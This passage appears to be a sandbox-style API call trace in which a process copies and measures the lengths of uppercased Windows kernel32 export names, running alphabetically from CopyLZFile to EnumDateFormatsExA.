lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.185] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.185] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.185] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.186] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.186] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.186] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.186] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.186] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.186] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.186] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.186] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.186] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.186] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.186] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.186] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.186] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.186] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.186] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.186] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.186] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.186] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.186] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.187] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.187] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.187] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.187] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.187] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.187] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.187] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.187] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.187] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.187] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.187] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.187] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.187] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.187] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.187] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.187] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.187] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.187] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.187] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.187] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.188] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.188] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.188] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.188] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.188] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.188] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.188] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.188] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.188] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.188] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.188] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.188] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.188] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.188] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.188] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.188] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.188] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.188] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.188] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.189] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.189] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.189] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.189] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.189] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.189] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.189] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.189] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.189] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.189] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.189] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.189] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.189] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.189] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.189] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.189] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.189] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.189] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.189] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.189] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.190] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.190] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.190] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.190] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.190] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.190] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.190] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.190] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.190] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.190] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.190] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.190] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.190] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.190] lstrlenA (lpString="DELETEATOM") returned 10 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.190] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.190] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.190] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.190] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.190] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.191] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.191] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.191] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.191] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.191] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.191] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.191] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.191] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.191] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.191] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.191] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.191] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.191] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.191] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.191] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.191] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.191] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.191] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.191] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.192] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.192] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.192] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.192] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.192] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.192] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.192] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.192] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.192] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.192] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.192] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.192] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.192] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.192] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.192] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") 